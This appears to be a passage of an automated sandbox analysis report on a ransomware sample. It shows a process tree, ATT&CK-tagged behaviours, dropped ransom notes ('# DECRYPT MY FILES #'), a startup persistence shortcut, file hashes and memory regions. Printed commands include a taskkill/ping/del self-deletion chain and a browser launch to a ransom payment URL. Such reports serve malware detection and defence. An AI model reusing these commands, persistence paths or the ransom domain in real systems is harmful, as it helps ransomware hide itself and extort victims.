                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,3753328730828288799,6050971730762034285,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5464 /prefetch:1
                                        6⤵
                                          PID:516
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,3753328730828288799,6050971730762034285,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4964 /prefetch:1
                                          6⤵
                                            PID:1672
                                        • C:\Windows\system32\NOTEPAD.EXE
                                          "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\# DECRYPT MY FILES #.txt
                                          5⤵
                                            PID:4156
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://52uo5k3t73ypjije.sentowing.trade/7D06-AB1D-FDD0-0072-B061?auto
                                            5⤵
                                              PID:2816
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff969aa46f8,0x7ff969aa4708,0x7ff969aa4718
                                                6⤵
                                                  PID:4316
                                              • C:\Windows\System32\WScript.exe
                                                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\# DECRYPT MY FILES #.vbs"
                                                5⤵
                                                  PID:2464
                                                • C:\Windows\system32\cmd.exe
                                                  /d /c taskkill /f /im "RdpSaProxy.exe" > NUL & ping -n 1 127.0.0.1 > NUL & del "C:\Users\Admin\AppData\Roaming\{A9B9797B-2350-5224-D0C5-BE661FD62C90}\RdpSaProxy.exe" > NUL
                                                  5⤵
                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                  PID:3432
                                                  • C:\Windows\system32\taskkill.exe
                                                    taskkill /f /im "RdpSaProxy.exe"
                                                    6⤵
                                                    • Kills process with taskkill
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:384
                                                  • C:\Windows\system32\PING.EXE
                                                    ping -n 1 127.0.0.1
                                                    6⤵
                                                    • System Network Configuration Discovery: Internet Connection Discovery
                                                    • Runs ping.exe
                                                    PID:1208
                                            • C:\Windows\SysWOW64\cmd.exe
                                              /d /c taskkill /f /im "0e7ba1cb5437ce3b1f1140747e4c6b64784fe58a427dab3dfc94c9f73fd0649b.exe" > NUL & ping -n 1 127.0.0.1 > NUL & del "C:\Users\Admin\AppData\Local\Temp\0e7ba1cb5437ce3b1f1140747e4c6b64784fe58a427dab3dfc94c9f73fd0649b.exe" > NUL
                                              3⤵
                                              • System Location Discovery: System Language Discovery
                                              • System Network Configuration Discovery: Internet Connection Discovery
                                              • Suspicious use of WriteProcessMemory
                                              PID:2228
                                              • C:\Windows\SysWOW64\taskkill.exe
                                                taskkill /f /im "0e7ba1cb5437ce3b1f1140747e4c6b64784fe58a427dab3dfc94c9f73fd0649b.exe"
                                                4⤵
                                                • System Location Discovery: System Language Discovery
                                                • Kills process with taskkill
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:1132
                                              • C:\Windows\SysWOW64\PING.EXE
                                                ping -n 1 127.0.0.1
                                                4⤵
                                                • System Location Discovery: System Language Discovery
                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                • Runs ping.exe
                                                PID:4556
                                        • C:\Windows\system32\vssvc.exe
                                          C:\Windows\system32\vssvc.exe
                                          1⤵
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:3668
                                        • C:\Windows\System32\CompPkgSrv.exe
                                          C:\Windows\System32\CompPkgSrv.exe -Embedding
                                          1⤵
                                            PID:1792
                                          • C:\Windows\System32\CompPkgSrv.exe
                                            C:\Windows\System32\CompPkgSrv.exe -Embedding
                                            1⤵
                                              PID:4988
                                            • C:\Windows\system32\AUDIODG.EXE
                                              C:\Windows\system32\AUDIODG.EXE 0x4f8 0x2fc
                                              1⤵
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:180

                                            Network

                                            MITRE ATT&CK Enterprise v15

                                            Replay Monitor

                                            Loading Replay Monitor...

                                            Downloads

                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                              Filesize

                                              152B

                                              MD5

                                              37f660dd4b6ddf23bc37f5c823d1c33a

                                              SHA1

                                              1c35538aa307a3e09d15519df6ace99674ae428b

                                              SHA256

                                              4e2510a1d5a50a94fe4ce0f74932ab780758a8cbdc6d176a9ce8ab92309f26f8

                                              SHA512

                                              807b8b8dc9109b6f78fc63655450bf12b9a006ff63e8f29ade8899d45fdf4a6c068c5c46a3efbc4232b9e1e35d6494f00ded5cdb3e235c8a25023bfbd823992d

                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                              Filesize

                                              152B

                                              MD5

                                              d7cb450b1315c63b1d5d89d98ba22da5

                                              SHA1

                                              694005cd9e1a4c54e0b83d0598a8a0c089df1556

                                              SHA256

                                              38355fd694faf1223518e40bac1996bdceaf44191214b0a23c4334d5fb07d031

                                              SHA512

                                              df04d4f4b77bae447a940b28aeac345b21b299d8d26e28ecbb3c1c9e9a0e07c551e412d545c7dbb147a92c12bad7ae49ac35af021c34b88e2c6c5f7a0b65f6a8

                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                              Filesize

                                              6KB

                                              MD5

                                              9f2116275cc141ca015739d66a25c4b5

                                              SHA1

                                              d651a587d779f119031a3e16962c45c77163fefc

                                              SHA256

                                              da9dce49e5f5c946a125da585114dc04b32f090d647368c054c754273eb8492a

                                              SHA512

                                              97cb3b16032b0ca7b0f2e05355924eaadf8458774d4363a921c01f6d536520c7a3f8137dee3bf2be8dc6641ee67f9cc095570093338bfaf5c24928609016b9d5

                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                              Filesize

                                              5KB

                                              MD5

                                              6fe59f4d86dfe6ff75b0e6e9f9f36070

                                              SHA1

                                              5d1577f0dac3de4bd84155574e49aaf0bda7dab4

                                              SHA256

                                              dde865b22247b35b7223671b84d00f3fe5df644aea2497f4148e1d75164058b6

                                              SHA512

                                              a1dc322a985364f50a16ce711bee1e09d3f53348924b62239f6465e5b967266aecf92d4bcd2afd82eebd76d6532fd8fbc516bd6971fe120037fe4708d9056205

                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                              Filesize

                                              16B

                                              MD5

                                              6752a1d65b201c13b62ea44016eb221f

                                              SHA1

                                              58ecf154d01a62233ed7fb494ace3c3d4ffce08b

                                              SHA256

                                              0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

                                              SHA512

                                              9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                              Filesize

                                              10KB

                                              MD5

                                              c37bde946b6010cd8ec8691f0b624ea5

                                              SHA1

                                              4c0e68d02ce6cbfa6d39f0680de0190328a3f7ca

                                              SHA256

                                              f79d03a3ca2350364f5c95be54fa8c3e0bda38defc89814fee7512fd5f334ab5

                                              SHA512

                                              bb1cb2bc32510e59c7f7736b38ff86c85d7f4242e483cc28e961daf0ab1d5dc95c55dddbddcfc4f8bd8854903c591340910fcd388e0e77aba0ac31f63b9eebd6

                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\DQ67RYHS\json[1].json

                                              Filesize

                                              291B

                                              MD5

                                              c085beeb6f771b90fed94c1d940f97f6

                                              SHA1

                                              44a994d9175d6abaa9a3b5718e242fa659aed66a

                                              SHA256

                                              ff5681f440a7a4b019a4a59f43ad414393321d1eb6dc3874cea0a84e73a83c51

                                              SHA512

                                              9d000581b287cd3d5464c33c260008090369a4f5f380b7cfa72eb0fc3221ce0e07df0387f6d3d6b38253c215250ac873dec0f52c501e3d6312f0a5437723a76a

                                            • C:\Users\Admin\AppData\Local\Temp\nszC380.tmp\System.dll

                                              Filesize

                                              11KB

                                              MD5

                                              6f5257c0b8c0ef4d440f4f4fce85fb1b

                                              SHA1

                                              b6ac111dfb0d1fc75ad09c56bde7830232395785

                                              SHA256

                                              b7ccb923387cc346731471b20fc3df1ead13ec8c2e3147353c71bb0bd59bc8b1

                                              SHA512

                                              a3cc27f1efb52fb8ecda54a7c36ada39cefeabb7b16f2112303ea463b0e1a4d745198d413eebb3551e012c84a20dcdf4359e511e51bc3f1a60b13f1e3bad1aa8

                                            • C:\Users\Admin\AppData\Roaming\# DECRYPT MY FILES #.html

                                              Filesize

                                              19KB

                                              MD5

                                              d8f3ea0b5ed6fab78f5137792e13ce03

                                              SHA1

                                              32b9f3184055199e19bcad19a9d9d9fad65b29e7

                                              SHA256

                                              b4e10ebb27656645f493688f38393a40c55f4e7edc191987213d26f9d9903737

                                              SHA512

                                              a626f1ec2da9db4f050667ca6e36306ecd3264eccd1f8a453434b678bd89b862bf9c1014094b745229f43c9da640171fd657fcbc408a9cd83018e0ac17b114a7

                                            • C:\Users\Admin\AppData\Roaming\# DECRYPT MY FILES #.txt

                                              Filesize

                                              10KB

                                              MD5

                                              a6a638260e9972d9dcfc6e1ab4f7135d

                                              SHA1

                                              2e4a14c7b92e3ad4fbb34dac24df63c8dcc18004

                                              SHA256

                                              e981f5cce5236360c4f943d70cd5de8fa3c24c57c5465e8689430ebbd23e0c11

                                              SHA512

                                              3083cd7dcbae4e0e637b84bc7def58103af13a7b13f6e5c8570fa845862f4fd8aa2846e501c0f500555a675b002c155761cccdc24ed649041fd6eb2e4ddc392f

                                            • C:\Users\Admin\AppData\Roaming\# DECRYPT MY FILES #.url

                                              Filesize

                                              95B

                                              MD5

                                              c286440ed4067438540a228e2b88f211

                                              SHA1

                                              877b624b159ad777aba5f10703d8eeebd658959e

                                              SHA256

                                              91dd8b752bb5bc354c725cc8bf1b370e7ce8de126ee444a58591c3d75feaece5

                                              SHA512

                                              91843b041c2403896c74a74565e9801d2b705a9af65e99dbc21827881fbb2dc185cee2825e562fddede0bb5cf25ed95dd106bed2cd149eff923348b422e98071

                                            • C:\Users\Admin\AppData\Roaming\# DECRYPT MY FILES #.vbs

                                              Filesize

                                              252B

                                              MD5

                                              18d46f5d8ebd3c7d6df0c7a8fd1bd64d

                                              SHA1

                                              aeb8407457434aabce2a4c2f95fe305c5303f929

                                              SHA256

                                              ceb35b75d397b07c84dfab3a28189e9431bdf80ec99ab65f9ccf01986bd4a8e9

                                              SHA512

                                              35fc759be0dee77eb9e39350873c24d9693cf6f370f171814e2ce6250ea814fea8a0887442ebae9077d6e9ff81ae7034faa0afcb080401a7d4ac384d2ba42d65

                                            • C:\Users\Admin\AppData\Roaming\Carney.u

                                              Filesize

                                              207KB

                                              MD5

                                              6a36196a13f457ed6efff3385594f449

                                              SHA1

                                              d0124f4427256df076cb2cab51085e59d957a291

                                              SHA256

                                              c82e4215a6e417ec0936855b92204a5623b26e2d0f34a1cf1040a1adb54dd009

                                              SHA512

                                              cbc33dbf02459ad97a0a89f26f8e394362106cf24c91dab645198bd5fb34872eab038b5e56adfd54c44b3490088c9ac360bc3add9c753af97cafc76ecda04b43

                                            • C:\Users\Admin\AppData\Roaming\ConfluxHolloa.qKk

                                              Filesize

                                              3KB

                                              MD5

                                              878c000b227f6a542878eef7857fc5ed

                                              SHA1

                                              5a7e4df3cfd0bd9fb84cfe38c6c7653be59405d2

                                              SHA256

                                              da592ab2b0dbd4fc2a9867ad2b70f1ba4188bb5f29cd4ab4ce39350edd648bc0

                                              SHA512

                                              254d042703f67b0f5381edb0b8552a2069ed8c4dee11fb9bbb8ba237983a55a327acdb9e3d2d76466c777390dbcd76e5082d21a2c77fe14eb90b5d6ea85963d1

                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\StartUp\RdpSaProxy.lnk

                                              Filesize

                                              1KB

                                              MD5

                                              50dec10d950050b218437d5ecad27712

                                              SHA1

                                              a8ca30fa68579e8b6a5e6a840a8b0a2387510fe6

                                              SHA256

                                              695da43263832146f3f18e618a36017985734bc73f0069ba1b745511bebf3826

                                              SHA512

                                              e2b16e82af97830004214c3515d2520f4b8342841ecf0b8722aeb17df937054954f3b9b1285274f3eb90af3bd2c4c4a3f0718f095cbb00a7c905a3aaec8e9979

                                            • C:\Users\Admin\AppData\Roaming\ProxySettings.dll

                                              Filesize

                                              72KB

                                              MD5

                                              dcc9cec91591178cdfcf411ebbe49418

                                              SHA1

                                              bf97d4ede34fb0420061eef9780198dc9f87db8d

                                              SHA256

                                              d7d7778e7d5852c945f7b181cf37d8e41decdaaddadffc37452e64f41339979f

                                              SHA512

                                              496938599e5f0351eb4e28102ea1ca39e1c68611c41dd0478b9d7016679e85ccba7c3c97541b31345742e94a7a69ac8efd149fd7540ae73d8d67848696e2c9a3

                                            • C:\Users\Admin\AppData\Roaming\chunker.output.doctype-system.xml

                                              Filesize

                                              1KB

                                              MD5

                                              a8ebedd88011c11d416276f8caa3206f

                                              SHA1

                                              337d53ebccba028582ca28b1dd4c205742f32cf2

                                              SHA256

                                              e48af2b3c3380566986a7e7df6b2424610cd05d8893aadfee3e98fea112fa22d

                                              SHA512

                                              6d58b3cd309566ac7884a0d2ff2086d51081deff5110b0f5ae367f89a6b4f3c84e60ff15065b618f4110d9dc5c646d55457e7613987e67a192088ac1b35e75fe

                                            • C:\Users\Admin\AppData\Roaming\chunker.output.doctype-system.xml

                                              Filesize

                                              1KB

                                              MD5

                                              e930bf24883de57b28a31a733d618645

                                              SHA1

                                              416f7f4e017f619d1ac89a34c1e34a5baad73c56

                                              SHA256

                                              2f3ce5515bead08015d327ba391060bd70614aea8b8c4325470723f824d51a21

                                              SHA512

                                              cfe4c11334a627ba2a5a022bf669a78df88ef9e641596bd7cac6fc590da62490e90f9ff3b1f06a169684820406e452f12be420b13de1b093ff1dd73abaee6b3a

                                            • C:\Users\Admin\AppData\Roaming\f2.png

                                              Filesize

                                              1KB

                                              MD5

                                              776bd82891e52f9430b3891103e8bd1c

                                              SHA1

                                              00a4de0a6fe8067fa41202f6312e1e85c0cf9126

                                              SHA256

                                              a08812bfa0464d79d082d2e2ad8d2cc4aa2c941fd3deb2e8e0c5fd015d9901ec

                                              SHA512

                                              d4f1adec624a79645d22c6c3901df2a91efa62399f4143384e47a5ab75fdd69a9373ef9cece6f51439fb2029782474f77ac18348e6c9f09848cdaf5cd73ae4cb

                                            • C:\Users\Admin\AppData\Roaming\{A9B9797B-2350-5224-D0C5-BE661FD62C90}\RdpSaProxy.exe

                                              Filesize

                                              255KB

                                              MD5

                                              1382caad112ebbb4d00257696a7bd9a6

                                              SHA1

                                              0a269602c823be96cc240fe7595cd05a6c24b8b7

                                              SHA256

                                              0e7ba1cb5437ce3b1f1140747e4c6b64784fe58a427dab3dfc94c9f73fd0649b

                                              SHA512

                                              ae105b757f81d7c479068b88de23a2b096c07f637c07fa024c6ab427310e94dc474ea0cf4ad92143304c94b20a5908051a1c648d91e63e96a889a1999bc1b057

                                            • memory/1732-16-0x0000000000400000-0x000000000043A000-memory.dmp

                                              Filesize

                                              232KB

                                            • memory/1732-18-0x0000000000400000-0x000000000043A000-memory.dmp

                                              Filesize

                                              232KB

                                            • memory/1732-19-0x0000000000400000-0x000000000043A000-memory.dmp

                                              Filesize

                                              232KB

                                            • memory/1732-22-0x0000000000400000-0x000000000043A000-memory.dmp

                                              Filesize

                                              232KB

                                            • memory/1732-24-0x0000000000400000-0x000000000043A000-memory.dmp

                                              Filesize

                                              232KB

                                            • memory/1732-32-0x0000000000400000-0x000000000043A000-memory.dmp

                                              Filesize

                                              232KB

                                            • memory/2584-53-0x00000000022B0000-0x00000000022C3000-memory.dmp

                                              Filesize

                                              76KB

                                            • memory/4420-931-0x0000000000400000-0x000000000043A000-memory.dmp

                                              Filesize

                                              232KB

                                            • memory/4420-949-0x0000000000400000-0x000000000043A000-memory.dmp

                                              Filesize

                                              232KB

                                            • memory/4420-71-0x0000000000400000-0x000000000043A000-memory.dmp

                                              Filesize

                                              232KB

                                            • memory/4420-72-0x0000000000400000-0x000000000043A000-memory.dmp

                                              Filesize

                                              232KB

                                            • memory/4420-922-0x0000000000400000-0x000000000043A000-memory.dmp

                                              Filesize

                                              232KB

                                            • memory/4420-925-0x0000000000400000-0x000000000043A000-memory.dmp

                                              Filesize

                                              232KB

                                            • memory/4420-928-0x0000000000400000-0x000000000043A000-memory.dmp

                                              Filesize

                                              232KB

                                            • memory/4420-59-0x0000000000400000-0x000000000043A000-memory.dmp

                                              Filesize

                                              232KB

                                            • memory/4420-934-0x0000000000400000-0x000000000043A000-memory.dmp

                                              Filesize

                                              232KB

                                            • memory/4420-937-0x0000000000400000-0x000000000043A000-memory.dmp

                                              Filesize

                                              232KB

                                            • memory/4420-940-0x0000000000400000-0x000000000043A000-memory.dmp

                                              Filesize

                                              232KB

                                            • memory/4420-943-0x0000000000400000-0x000000000043A000-memory.dmp

                                              Filesize

                                              232KB

                                            • memory/4420-946-0x0000000000400000-0x000000000043A000-memory.dmp

                                              Filesize

                                              232KB

                                            • memory/4420-95-0x0000000000400000-0x000000000043A000-memory.dmp

                                              Filesize

                                              232KB

                                            • memory/4420-952-0x0000000000400000-0x000000000043A000-memory.dmp

                                              Filesize

                                              232KB

                                            • memory/4420-955-0x0000000000400000-0x000000000043A000-memory.dmp

                                              Filesize

                                              232KB

                                            • memory/4420-961-0x0000000000400000-0x000000000043A000-memory.dmp

                                              Filesize

                                              232KB

                                            • memory/4420-964-0x0000000000400000-0x000000000043A000-memory.dmp

                                              Filesize

                                              232KB

                                            • memory/4420-958-0x0000000000400000-0x000000000043A000-memory.dmp

                                              Filesize

                                              232KB

                                            • memory/4420-967-0x0000000000400000-0x000000000043A000-memory.dmp

                                              Filesize

                                              232KB

                                            • memory/4420-70-0x0000000000400000-0x000000000043A000-memory.dmp

                                              Filesize

                                              232KB

                                            • memory/4420-66-0x0000000000400000-0x000000000043A000-memory.dmp

                                              Filesize

                                              232KB

                                            • memory/4420-63-0x0000000000400000-0x000000000043A000-memory.dmp

                                              Filesize

                                              232KB

                                            • memory/4420-1003-0x0000000000400000-0x000000000043A000-memory.dmp

                                              Filesize

                                              232KB

                                            • memory/4420-1002-0x0000000000400000-0x000000000043A000-memory.dmp

                                              Filesize

                                              232KB

                                            • memory/4420-62-0x0000000000400000-0x000000000043A000-memory.dmp

                                              Filesize

                                              232KB

                                            • memory/4420-58-0x0000000000400000-0x000000000043A000-memory.dmp

                                              Filesize

                                              232KB

                                            • memory/4736-13-0x0000000003050000-0x0000000003063000-memory.dmp

                                              Filesize

                                              76KB